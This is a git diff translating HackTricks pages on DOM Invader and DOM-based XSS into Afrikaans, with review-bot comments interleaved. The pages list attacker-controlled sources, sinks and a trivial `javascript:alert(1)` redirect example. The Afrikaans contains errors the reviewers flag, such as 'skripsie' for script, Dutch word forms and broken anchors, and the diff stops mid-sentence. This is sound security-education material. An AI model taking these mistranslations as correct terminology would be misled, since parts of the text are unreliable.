+## DOM-vervuiling -## DOM clobbering +In die vorige prentjie is dit moontlik om te sien dat die soektog na DOM-vervuilings aangeskakel kan word. Sodra dit gedoen is, sal **DOM Invader begin soek na DOM-vervuilbaarhede**. -In the previous image it's possible to see that DOM clobbering scan can be turned on. Once done, **DOM Invader will start searching for DOM clobbering vulnerabilities**. - -## References +## Verwysings * [https://portswigger.net/burp/documentation/desktop/tools/dom-invader](https://portswigger.net/burp/documentation/desktop/tools/dom-invader) * [https://portswigger.net/burp/documentation/desktop/tools/dom-invader/enabling](https://portswigger.net/burp/documentation/desktop/tools/dom-invader/enabling) @@ -102,14 +100,14 @@ In the previous image it's possible to see that DOM clobbering scan can be turne
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
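Review bot: the `source` bullet under Message details in the dom-invader.md hunk @@ -2,96 +2,94 @@ inverts the original meaning: 'it doesn't assure the validation can't be bypassed' became 'verseker dit nie dat die verifikasie omseil kan word nie', which no longer says the check may still be bypassed; it should read 'beteken dit steeds nie dat die verifikasie nie omseil kan word nie'. In the same hunk 'sink' is rendered 'sappe'/'sap' (juice) in the intro and in the `data` bullet, and 'lekke' (leaks) in the gadget-scan steps, while dom-xss.md in this same patch keeps 'sinks'; keep the English term throughout. 'Vulnerabilities' alternates between 'gebreklikhede' and 'kwesbaarhede' in consecutive paragraphs, `## DOM-vervuiling` renders DOM clobbering with the same word used for prototype pollution ('prototipevervuiling'), so the two techniques become indistinguishable in the headings, and Burp UI labels (Messages, Data, Send, Test, Scan for gadgets, DOM view) are translated although the product UI is English, with 'DOM view' turning into 'DOM-sigbaarheid' (visibility); keep the labels as they appear in the tool.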
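Review bot: in the dom-invader.md footer hunk (@@ -102,14 +100,14 @@) 'official PEASS & HackTricks swag' becomes 'PEASS & HackTricks-uitrusting', whereas the header hunk of the same file and the dom-clobbering.md footer keep 'swag'; this banner is boilerplate repeated on every page, so use one rendering. Similarly, the References hunk of dom-clobbering.md (@@ -229,22 +198,22 @@) translates the book title 'JavaScript for hackers: Learn to think like a hacker'; a citation should keep the published title so readers can find the book.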
diff --git a/pentesting-web/xss-cross-site-scripting/dom-xss.md b/pentesting-web/xss-cross-site-scripting/dom-xss.md index 324d7c32c..6154403b9 100644 --- a/pentesting-web/xss-cross-site-scripting/dom-xss.md +++ b/pentesting-web/xss-cross-site-scripting/dom-xss.md @@ -2,31 +2,30 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**hacktricks-repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud-repo**](https://github.com/carlospolop/hacktricks-cloud).
-## DOM Vulnerabilities +## DOM Kwesbaarhede -DOM vulnerabilities occur when data from attacker-controlled **sources** (like `location.search`, `document.referrer`, or `document.cookie`) is unsafely transferred to **sinks**. Sinks are functions or objects (e.g., `eval()`, `document.body.innerHTML`) that can execute or render harmful content if given malicious data. +DOM-kwesbaarhede kom voor wanneer data vanaf aanvaller-beheerde **bronne** (soos `location.search`, `document.referrer`, of `document.cookie`) onveilig oorgedra word na **sinks**. Sinks is funksies of objekte (bv. `eval()`, `document.body.innerHTML`) wat skadelike inhoud kan uitvoer of vertoon as dit kwaadwillige data ontvang. -- **Sources** are inputs that can be manipulated by attackers, including URLs, cookies, and web messages. -- **Sinks** are potentially dangerous endpoints where malicious data can lead to adverse effects, such as script execution. +- **Bronne** is insette wat deur aanvallers gemanipuleer kan word, insluitend URL's, koekies, en webboodskappe. +- **Sinks** is potensieel gevaarlike eindpunte waar kwaadwillige data kan lei tot nadelige gevolge, soos skripsie-uitvoering. -The risk arises when data flows from a source to a sink without proper validation or sanitation, enabling attacks like XSS. +Die risiko ontstaan wanneer data vanaf 'n bron na 'n sink vloei sonder behoorlike validering of sanitisering, wat aanvalle soos XSS moontlik maak. {% hint style="info" %} -**You can find a more updated list of sources and sinks in** [**https://github.com/wisec/domxsswiki/wiki**](https://github.com/wisec/domxsswiki/wiki) +**Jy kan 'n meer bygewerkte lys van bronne en sinks vind in** [**https://github.com/wisec/domxsswiki/wiki**](https://github.com/wisec/domxsswiki/wiki) {% endhint %} -**Common sources:** - +**Gewone bronne:** ```javascript document.URL document.documentURI 
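Review bot: 'skripsie-uitvoering' in the `Sinks` bullet of the dom-xss.md hunk @@ -2,31 +2,30 @@ is wrong: 'skripsie' is a thesis; script execution is 'skrip-uitvoering' (the clobbering page in this patch already uses 'skrips'). This hunk keeps 'sinks' in English, which is the right call; the dom-invader.md hunks should be aligned with it rather than the other way round.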
@@ -43,13 +42,12 @@ sessionStorage IndexedDB (mozIndexedDB, webkitIndexedDB, msIndexedDB) Database ``` +**Gewone Sinks:** -**Common Sinks:** - -| [**Open Redirect**](dom-xss.md#open-redirect) | [**Javascript Injection**](dom-xss.md#javascript-injection) | [**DOM-data manipulation**](dom-xss.md#dom-data-manipulation) | **jQuery** | +| [**Oop Herlei**](dom-xss.md#open-redirect) | [**Javascript Injeksie**](dom-xss.md#javascript-injection) | [**DOM-data manipulasie**](dom-xss.md#dom-data-manipulation) | **jQuery** | | -------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------- | ------------------------------------------------------------- | ---------------------------------------------------------------------- | | `location` | `eval()` | `scriptElement.src` | `add()` | -| `location.host` | `Function() constructor` | `scriptElement.text` | `after()` | +| `location.host` | `Function() konstrukteur` | `scriptElement.text` | `after()` | | `location.hostname` | `setTimeout()` | `scriptElement.textContent` | `append()` | | `location.href` | `setInterval()` | `scriptElement.innerText` | `animate()` | | `location.pathname` | `setImmediate()` | `someDOMElement.setAttribute()` | `insertAfter()` | 
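Review bot: both blank lines between `**Gewone Sinks:**` and the table header row are removed in this hunk, so the label sits directly against the table; keep one blank line there as the original had, consistent with the other tables in the repo. The code span `Function() constructor` is also changed to `Function() konstrukteur`; text inside backticks is rendered as code and should stay as in the English source.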
@@ -58,46 +56,45 @@ Database | `location.assign()` | `msSetImmediate()` | `someDOMElement.textContent` | `html()` | | `location.replace()` | `range.createContextualFragment()` | `someDOMElement.innerText` | `prepend()` | | `open()` | `crypto.generateCRMFRequest()` | `someDOMElement.outerText` | `replaceAll()` | -| `domElem.srcdoc` | **\`\`**[**Local file-path manipulation**](dom-xss.md#local-file-path-manipulation) | `someDOMElement.value` | `replaceWith()` | +| `domElem.srcdoc` | **\`\`**[**Plaaslike lêerpad manipulasie**](dom-xss.md#local-file-path-manipulation) | `someDOMElement.value` | `replaceWith()` | | `XMLHttpRequest.open()` | `FileReader.readAsArrayBuffer()` | `someDOMElement.name` | `wrap()` | | `XMLHttpRequest.send()` | `FileReader.readAsBinaryString()` | `someDOMElement.target` | `wrapInner()` | | `jQuery.ajax()` | `FileReader.readAsDataURL()` | `someDOMElement.method` | `wrapAll()` | | `$.ajax()` | `FileReader.readAsText()` | `someDOMElement.type` | `has()` | -| **\`\`**[**Ajax request manipulation**](dom-xss.md#ajax-request-manipulation) | `FileReader.readAsFile()` | `someDOMElement.backgroundImage` | `constructor()` | +| **\`\`**[**Ajax versoek manipulasie**](dom-xss.md#ajax-request-manipulation) | `FileReader.readAsFile()` | `someDOMElement.backgroundImage` | `constructor()` | | `XMLHttpRequest.setRequestHeader()` | `FileReader.root.getFile()` | `someDOMElement.cssText` | `init()` | | `XMLHttpRequest.open()` | `FileReader.root.getFile()` | `someDOMElement.codebase` | `index()` | -| `XMLHttpRequest.send()` | [**Link manipulation**](dom-xss.md#link-manipulation) | `someDOMElement.innerHTML` | `jQuery.parseHTML()` | +| `XMLHttpRequest.send()` | [**Skakel manipulasie**](dom-xss.md#link-manipulation) | `someDOMElement.innerHTML` | `jQuery.parseHTML()` | | `jQuery.globalEval()` | `someDOMElement.href` | `someDOMElement.outerHTML` | `$.parseHTML()` | -| `$.globalEval()` | `someDOMElement.src` | `someDOMElement.insertAdjacentHTML` | [**Client-side JSON 
injection**](dom-xss.md#client-side-sql-injection) | -| **\`\`**[**HTML5-storage manipulation**](dom-xss.md#html-5-storage-manipulation) | `someDOMElement.action` | `someDOMElement.onevent` | `JSON.parse()` | -| `sessionStorage.setItem()` | [**XPath injection**](dom-xss.md#xpath-injection) | `document.write()` | `jQuery.parseJSON()` | +| `$.globalEval()` | `someDOMElement.src` | `someDOMElement.insertAdjacentHTML` | [**Kliëntkant JSON injeksie**](dom-xss.md#client-side-sql-injection) | +| **\`\`**[**HTML5-opberg manipulasie**](dom-xss.md#html-5-storage-manipulation) | `someDOMElement.action` | `someDOMElement.onevent` | `JSON.parse()` | +| `sessionStorage.setItem()` | [**XPath injeksie**](dom-xss.md#xpath-injection) | `document.write()` | `jQuery.parseJSON()` | | `localStorage.setItem()` | `document.evaluate()` | `document.writeln()` | `$.parseJSON()` | -| **``**[**`Denial of Service`**](dom-xss.md#denial-of-service)**``** | `someDOMElement.evaluate()` | `document.title` | **\`\`**[**Cookie manipulation**](dom-xss.md#cookie-manipulation) | -| `requestFileSystem()` | **\`\`**[**Document-domain manipulation**](dom-xss.md#document-domain-manipulation) | `document.implementation.createHTMLDocument()` | `document.cookie` | -| `RegExp()` | `document.domain` | `history.pushState()` | [**WebSocket-URL poisoning**](dom-xss.md#websocket-url-poisoning) | -| [**Client-Side SQl injection**](dom-xss.md#client-side-sql-injection) | [**Web-message manipulation**](dom-xss.md#web-message-manipulation) | `history.replaceState()` | `WebSocket` | +| **``**[**`Dienste weier`**](dom-xss.md#denial-of-service)**``** | `someDOMElement.evaluate()` | `document.title` | **\`\`**[**Koekie manipulasie**](dom-xss.md#cookie-manipulation) | +| `requestFileSystem()` | **\`\`**[**Dokument-domein manipulasie**](dom-xss.md#document-domain-manipulation) | `document.implementation.createHTMLDocument()` | `document.cookie` | +| `RegExp()` | `document.domain` | `history.pushState()` | [**WebSocket-URL 
vergiftiging**](dom-xss.md#websocket-url-poisoning) | +| [**Kliëntkant SQL injeksie**](dom-xss.md#client-side-sql-injection) | [**Web-boodskap manipulasie**](dom-xss.md#web-message-manipulation) | `history.replaceState()` | `WebSocket` | | `executeSql()` | `postMessage()` | \`\` | \`\` | -The **`innerHTML`** sink doesn't accept `script` elements on any modern browser, nor will `svg onload` events fire. This means you will need to use alternative elements like `img` or `iframe`. +Die **`innerHTML`** sink aanvaar nie `script` elemente op enige moderne blaaier nie, en `svg onload` gebeure sal ook nie plaasvind nie. Dit beteken dat jy alternatiewe elemente soos `img` of `iframe` sal moet gebruik. -This kind of XSS is probably the **hardest to find**, as you need to look inside the JS code, see if it's **using** any object whose **value you control**, and in that case, see if there is **any way to abuse** it to execute arbitrary JS. +Hierdie tipe XSS is waarskynlik die **moeilikste om te vind**, aangesien jy binne-in die JS-kode moet kyk, sien of dit enige objek gebruik waarvan jy die waarde beheer, en in daardie geval sien of daar enige manier is om dit te misbruik om willekeurige JS uit te voer. -## Tools to find them +## Gereedskap om hulle te vind * [https://github.com/mozilla/eslint-plugin-no-unsanitized](https://github.com/mozilla/eslint-plugin-no-unsanitized) -## Examples +## Voorbeelde -### Open Redirect +### Oop Herlei -From: [https://portswigger.net/web-security/dom-based/open-redirection](https://portswigger.net/web-security/dom-based/open-redirection) +Van: [https://portswigger.net/web-security/dom-based/open-redirection](https://portswigger.net/web-security/dom-based/open-redirection) -**Open redirect vulnerabilities in the DOM** occur when a script writes data, which an attacker can control, into a sink capable of initiating navigation across domains. 
+**Oop herlei kwesbaarhede in die DOM** kom voor wanneer 'n skripsie data skryf, wat 'n aanvaller kan beheer, na 'n sink wat in staat is om navigasie oor domeine te begin. -It's crucial to understand that executing arbitrary code, such as **`javascript:alert(1)`**, is possible if you have control over the start of the URL where the redirection occurs. +Dit is van kritieke belang om te verstaan dat die uitvoering van willekeurige kode, soos **`javascript:alert(1)`**, moontlik is as jy beheer het oor die begin van die URL waar die herleiding plaasvind. Sinks: - ```javascript location location.host 
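Review bot: this hunk translates the section headings (`### Oop Herlei`, and the later `### Koekie manipulasie`, `### Weiering van Diens`, and so on) while the sinks table keeps linking to the English-derived anchors (`dom-xss.md#open-redirect`, `#cookie-manipulation`, `#denial-of-service`); since the anchors are generated from the heading text, these in-page links stop resolving unless the headings keep their English slugs or the anchors are updated to the new headings. Related: the table cell reads `Dienste weier` while the heading for the same section in the `@@ -315,20` hunk reads `Weiering van Diens`, and the `Kliëntkant JSON injeksie` cell still points at `#client-side-sql-injection` instead of the JSON-injection section (a pre-existing error worth fixing while touching the row). "Van:" is also used here for "From:" where later hunks use "Vanaf:"; pick one.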
@@ -115,27 +112,23 @@ XMLHttpRequest.send() jQuery.ajax() $.ajax() ``` +### Koekie manipulasie -### Cookie manipulation +Vanaf: [https://portswigger.net/web-security/dom-based/cookie-manipulation](https://portswigger.net/web-security/dom-based/cookie-manipulation) -From: [https://portswigger.net/web-security/dom-based/cookie-manipulation](https://portswigger.net/web-security/dom-based/cookie-manipulation) - -DOM-based cookie-manipulation vulnerabilities occur when a script incorporates data, which can be controlled by an attacker, into the value of a cookie. This vulnerability can lead to unexpected behavior of the webpage if the cookie is utilized within the site. Additionally, it can be exploited to carry out a session fixation attack if the cookie is involved in tracking user sessions. The primary sink associated with this vulnerability is: +DOM-gebaseerde koekie-manipulasie kwesbaarhede kom voor wanneer 'n skripsie data insluit, wat deur 'n aanvaller beheer kan word, in die waarde van 'n koekie. Hierdie kwesbaarheid kan lei tot onverwagte gedrag van die webbladsy as die koekie binne die webwerf gebruik word. Daarbenewens kan dit uitgebuit word om 'n sessie-fixatie-aanval uit te voer as die koekie betrokke is by die volg van gebruikersessies. Die primêre sink wat met hierdie kwesbaarheid geassosieer word, is: Sinks: - ```javascript document.cookie ``` +### JavaScript Injeksie -### JavaScript Injection +Vanaf: [https://portswigger.net/web-security/dom-based/javascript-injection](https://portswigger.net/web-security/dom-based/javascript-injection) -From: [https://portswigger.net/web-security/dom-based/javascript-injection](https://portswigger.net/web-security/dom-based/javascript-injection) - -DOM-based JavaScript injection vulnerabilities are created when a script runs data, which can be controlled by an attacker, as JavaScript code. 
+DOM-gebaseerde JavaScript-injeksiekwesbaarhede word geskep wanneer 'n skrips data uitvoer, wat deur 'n aanvaller beheer kan word, as JavaScript-kode. Sinks: - ```javascript eval() Function() constructor 
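Review bot: "'n skrips data uitvoer" in the JavaScript-injeksie paragraph is a typo ("skrip"), and this hunk switches to "Vanaf:" for "From:" where the previous hunk used "Van:". Both the cookie and the JavaScript-injection sections also lose the blank line before the javascript code fence (`Sinks: -` followed directly by the fence); keep it.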
@@ -148,53 +141,47 @@ msSetImmediate() range.createContextualFragment() crypto.generateCRMFRequest() ``` +### Dokument-domein manipulasie -### Document-domain manipulation +Vanaf: [https://portswigger.net/web-security/dom-based/document-domain-manipulation](https://portswigger.net/web-security/dom-based/document-domain-manipulation) -From: [https://portswigger.net/web-security/dom-based/document-domain-manipulation](https://portswigger.net/web-security/dom-based/document-domain-manipulation) +**Dokument-domein manipulasie kwesbaarhede** kom voor wanneer 'n skripsie die `document.domain` eienskap stel deur gebruik te maak van data wat 'n aanvaller kan beheer. -**Document-domain manipulation vulnerabilities** occur when a script sets the `document.domain` property using data that an attacker can control. - -The `document.domain` property plays a **key role** in the **enforcement** of the **same-origin policy** by browsers. When two pages from different origins set their `document.domain` to the **same value**, they can interact without restrictions. Although browsers impose certain **limits** on the values assignable to `document.domain`, preventing the assignment of completely unrelated values to the actual page origin, exceptions exist. Typically, browsers permit the use of **child** or **parent domains**. +Die `document.domain` eienskap speel 'n **sleutelrol** in die **handhawing** van die **selfde-oorsprong beleid** deur webblaaier. Wanneer twee bladsye vanaf verskillende oorspronge hul `document.domain` na dieselfde waarde stel, kan hulle sonder beperkings met mekaar interaksie hê. Alhoewel webblaaier sekere **grense** opleg op die waardes wat toegewys kan word aan `document.domain`, om die toewysing van heeltemal onverwante waardes aan die werklike bladsy-oorsprong te voorkom, bestaan daar uitsonderings. Gewoonlik laat webblaaier die gebruik van **kind** of **ouer domeine** toe. 
Sinks: - ```javascript document.domain ``` +### WebSocket-URL vergiftiging -### WebSocket-URL poisoning +Van: [https://portswigger.net/web-security/dom-based/websocket-url-poisoning](https://portswigger.net/web-security/dom-based/websocket-url-poisoning) -From: [https://portswigger.net/web-security/dom-based/websocket-url-poisoning](https://portswigger.net/web-security/dom-based/websocket-url-poisoning) - -**WebSocket-URL poisoning** occurs when a script utilizes **controllable data as the target URL** for a WebSocket connection. +**WebSocket-URL vergiftiging** vind plaas wanneer 'n skrip **beheerbare data as die teiken-URL** vir 'n WebSocket-verbinding gebruik. Sinks: -The `WebSocket` constructor can lead to WebSocket-URL poisoning vulnerabilities. +Die `WebSocket` konstrukteur kan lei tot WebSocket-URL vergiftigingskwesbaarhede. -### Link manipulation +### Skakel manipulasie -From: [https://portswigger.net/web-security/dom-based/link-manipulation](https://portswigger.net/web-security/dom-based/link-manipulation) +Van: [https://portswigger.net/web-security/dom-based/link-manipulation](https://portswigger.net/web-security/dom-based/link-manipulation) -**DOM-based link-manipulation vulnerabilities** arise when a script writes **attacker-controllable data to a navigation target** within the current page, such as a clickable link or the submission URL of a form. +**DOM-gebaseerde skakel-manipulasiekwesbaarhede** ontstaan wanneer 'n skrip **aanvaller-beheerbare data na 'n navigasie-teiken** binne die huidige bladsy skryf, soos 'n kliekbare skakel of die indienings-URL van 'n vorm. 
Sinks: - ```javascript someDOMElement.href someDOMElement.src someDOMElement.action ``` +### Ajax versoek manipulasie -### Ajax request manipulation +Vanaf: [https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation](https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation) -From: [https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation](https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation) - -**Ajax request manipulation vulnerabilities** arise when a script writes **attacker-controllable data into an Ajax request** that is issued using an `XmlHttpRequest` object. +**Ajax versoek manipulasie kwesbaarhede** ontstaan wanneer 'n skripsie **aanvaller-beheerbare data in 'n Ajax versoek skryf** wat uitgereik word met behulp van 'n `XmlHttpRequest` objek. Sinks: - ```javascript XMLHttpRequest.setRequestHeader() XMLHttpRequest.open() 
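Review bot: "deur webblaaier" and "laat webblaaier ... toe" in the document-domain paragraph should be plural ("webblaaiers") to match "browsers" in the source. The hunk also alternates between "skrip" (WebSocket and link-manipulation paragraphs) and "skripsie" (document-domain and Ajax paragraphs) for the same word; use "skrip" throughout. The blank lines before the three code fences are dropped here as well.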
@@ -202,15 +189,13 @@ XMLHttpRequest.send() jQuery.globalEval() $.globalEval() ``` +### Plaaslike lêerpad-manipulasie -### Local file-path manipulation +Van: [https://portswigger.net/web-security/dom-based/local-file-path-manipulation](https://portswigger.net/web-security/dom-based/local-file-path-manipulation) -From: [https://portswigger.net/web-security/dom-based/local-file-path-manipulation](https://portswigger.net/web-security/dom-based/local-file-path-manipulation) - -**Local file-path manipulation vulnerabilities** arise when a script passes **attacker-controllable data to a file-handling API** as the `filename` parameter. This vulnerability can be exploited by an attacker to construct a URL that, if visited by another user, could lead to the **user's browser opening or writing an arbitrary local file**. +**Plaaslike lêerpad-manipulasie kwesbaarhede** ontstaan wanneer 'n skripsie **aanvaller-beheerbare data aan 'n lêerhanterings-API** deurgee as die `filename` parameter. Hierdie kwesbaarheid kan deur 'n aanvaller uitgebuit word om 'n URL te konstrueer wat, as dit deur 'n ander gebruiker besoek word, kan lei tot die **gebruiker se blaaier wat 'n willekeurige plaaslike lêer oopmaak of skryf**. Sinks: - ```javascript FileReader.readAsArrayBuffer() FileReader.readAsBinaryString() 
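Review bot: the heading here reads `### Plaaslike lêerpad-manipulasie` (hyphenated) while the table cell in the `@@ -58,46` hunk reads `Plaaslike lêerpad manipulasie`; make the two agree, and keep the blank line before the javascript code fence as in the original.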
@@ -220,77 +205,67 @@ FileReader.readAsFile() FileReader.root.getFile() FileReader.root.getFile() ``` +### Kliëntkant SQL-inspuiting -### Client-Side SQl injection +Van: [https://portswigger.net/web-security/dom-based/client-side-sql-injection](https://portswigger.net/web-security/dom-based/client-side-sql-injection) -From: [https://portswigger.net/web-security/dom-based/client-side-sql-injection](https://portswigger.net/web-security/dom-based/client-side-sql-injection) - -**Client-side SQL-injection vulnerabilities** occur when a script incorporates **attacker-controllable data into a client-side SQL query in an unsafe way**. - -Sinks: +**Kliëntkant SQL-inspuitingskwetsbaarhede** kom voor wanneer 'n skripsie **aanvaller-beheerbare data op 'n onveilige manier in 'n kliëntkant SQL-navraag inkorporeer**. +Sinks: ```javascript executeSql() ``` +### HTML5-opbergingsmanipulasie -### HTML5-storage manipulation +Van: [https://portswigger.net/web-security/dom-based/html5-storage-manipulation](https://portswigger.net/web-security/dom-based/html5-storage-manipulation) -From: [https://portswigger.net/web-security/dom-based/html5-storage-manipulation](https://portswigger.net/web-security/dom-based/html5-storage-manipulation) - -**HTML5-storage manipulation vulnerabilities** arise when a script **stores attacker-controllable data in the web browser's HTML5 storage** (`localStorage` or `sessionStorage`). While this action is not inherently a security vulnerability, it becomes problematic if the application subsequently **reads the stored data and processes it unsafely**. This could allow an attacker to leverage the storage mechanism to conduct other DOM-based attacks, such as cross-site scripting and JavaScript injection. +**HTML5-opbergingsmanipulasie kwesbaarhede** ontstaan wanneer 'n skripsie **aanvaller-beheerbare data in die webblaaier se HTML5-opberging** (`localStorage` of `sessionStorage`) stoor. 
Alhoewel hierdie aksie nie inherent 'n sekuriteitskwesbaarheid is nie, word dit problematies as die toepassing vervolgens **die gestoorde data lees en dit onveilig verwerk**. Dit kan 'n aanvaller in staat stel om die opbergingsmeganisme te gebruik om ander DOM-gebaseerde aanvalle uit te voer, soos kruissite-skripsing en JavaScript-inspuiting. Sinks: - ```javascript sessionStorage.setItem() localStorage.setItem() ``` +### XPath-inspuiting -### XPath injection +Vanaf: [https://portswigger.net/web-security/dom-based/client-side-xpath-injection](https://portswigger.net/web-security/dom-based/client-side-xpath-injection) -From: [https://portswigger.net/web-security/dom-based/client-side-xpath-injection](https://portswigger.net/web-security/dom-based/client-side-xpath-injection) - -**DOM-based XPath-injection vulnerabilities** occur when a script incorporates **attacker-controllable data into an XPath query**. +**DOM-gebaseerde XPath-inspuitingskwetsbaarheden** kom voor wanneer 'n skripsie **aanvaller-beheerbare data in 'n XPath-navraag** inkorporeer. Sinks: - ```javascript document.evaluate() someDOMElement.evaluate() ``` +### Kliëntkant JSON-injeksie -### Client-side JSON injection +Vanaf: [https://portswigger.net/web-security/dom-based/client-side-json-injection](https://portswigger.net/web-security/dom-based/client-side-json-injection) -From: [https://portswigger.net/web-security/dom-based/client-side-json-injection](https://portswigger.net/web-security/dom-based/client-side-json-injection) - -**DOM-based JSON-injection vulnerabilities** occur when a script incorporates **attacker-controllable data into a string that is parsed as a JSON data structure and then processed by the application**. +**DOM-gebaseerde JSON-injeksie kwesbaarhede** kom voor wanneer 'n skripsie **aanvaller-beheerbare data inkorporeer in 'n string wat as 'n JSON-datastruktuur geïnterpreteer word en dan deur die toepassing verwerk word**. 
Sinks: - ```javascript JSON.parse() jQuery.parseJSON() $.parseJSON() ``` +### Web-boodskap manipulasie -### Web-message manipulation +Vanaf: [https://portswigger.net/web-security/dom-based/web-message-manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation) -From: [https://portswigger.net/web-security/dom-based/web-message-manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation) - -**Web-message vulnerabilities** arise when a script sends **attacker-controllable data as a web message to another document** within the browser. An **example** of vulnerable Web-message manipulation can be found at [PortSwigger's Web Security Academy](https://portswigger.net/web-security/dom-based/controlling-the-web-message-source). +**Web-boodskap kwesbaarhede** ontstaan wanneer 'n skripsie **aanvaller-beheerbare data as 'n web-boodskap na 'n ander dokument** binne die blaaier stuur. 'n **Voorbeeld** van 'n kwesbare Web-boodskap manipulasie kan gevind word by [PortSwigger se Web Security Academy](https://portswigger.net/web-security/dom-based/controlling-the-web-message-source). Sinks: -The `postMessage()` method for sending web messages can lead to vulnerabilities if the event listener for receiving messages handles the incoming data in an unsafe way. +Die `postMessage()` metode vir die stuur van web-boodskappe kan kwesbaarhede veroorsaak as die gebeurtenisluisteraar vir die ontvangs van boodskappe die inkomende data op 'n onveilige manier hanteer. 
-### DOM-data manipulation +### DOM-data manipulasie -From: [https://portswigger.net/web-security/dom-based/dom-data-manipulation](https://portswigger.net/web-security/dom-based/dom-data-manipulation) +Vanaf: [https://portswigger.net/web-security/dom-based/dom-data-manipulation](https://portswigger.net/web-security/dom-based/dom-data-manipulation) -**DOM-data manipulation vulnerabilities** arise when a script writes **attacker-controllable data to a field within the DOM** that is utilized within the visible UI or client-side logic. This vulnerability can be exploited by an attacker to construct a URL that, if visited by another user, can alter the appearance or behaviour of the client-side UI. +**DOM-data manipulasie kwesbaarhede** ontstaan wanneer 'n skripsie **aanvaller-beheerbare data na 'n veld binne die DOM skryf** wat gebruik word binne die sigbare UI of kliëntkant-logika. Hierdie kwesbaarheid kan deur 'n aanvaller uitgebuit word om 'n URL te konstrueer wat, as dit deur 'n ander gebruiker besoek word, die voorkoms of gedrag van die kliëntkant UI kan verander. Sinks: - ```javascript scriptElement.src scriptElement.text 
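Review bot: "kwetsbaarhede" (SQL-injection paragraph) and "kwetsbaarheden" (XPath paragraph) are Dutch forms; the rest of the file uses the Afrikaans "kwesbaarhede". The same hunk removes the blank line between the SQL-injection paragraph and the `Sinks:` label (`+... inkorporeer**.` followed directly by `+Sinks:`), so `Sinks:` becomes a continuation of the paragraph instead of its own line; restore it. Terminology also drifts between "inspuiting" here (SQL, XPath) and "injeksie" in the table and the JSON heading; pick one.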
@@ -315,20 +290,17 @@ document.implementation.createHTMLDocument() history.pushState() history.replaceState() ``` +### Weiering van Diens -### Denial of Service +Vanaf: [https://portswigger.net/web-security/dom-based/denial-of-service](https://portswigger.net/web-security/dom-based/denial-of-service) -From: [https://portswigger.net/web-security/dom-based/denial-of-service](https://portswigger.net/web-security/dom-based/denial-of-service) - -**DOM-based denial-of-service vulnerabilities** occur when a script passes **attacker-controllable data unsafely to a problematic platform API**. This includes APIs that, when invoked, can lead the user's computer to consume **excessive amounts of CPU or disk space**. Such vulnerabilities can have significant side effects, such as the browser restricting the website's functionality by rejecting attempts to store data in `localStorage` or terminating busy scripts. +**DOM-gebaseerde weiering van diens kwesbaarhede** kom voor wanneer 'n skripsie **aanvaller-beheerbare data onveilig deurgee na 'n problematiese platform API**. Dit sluit API's in wat, wanneer dit aangeroep word, kan lei tot die gebruiker se 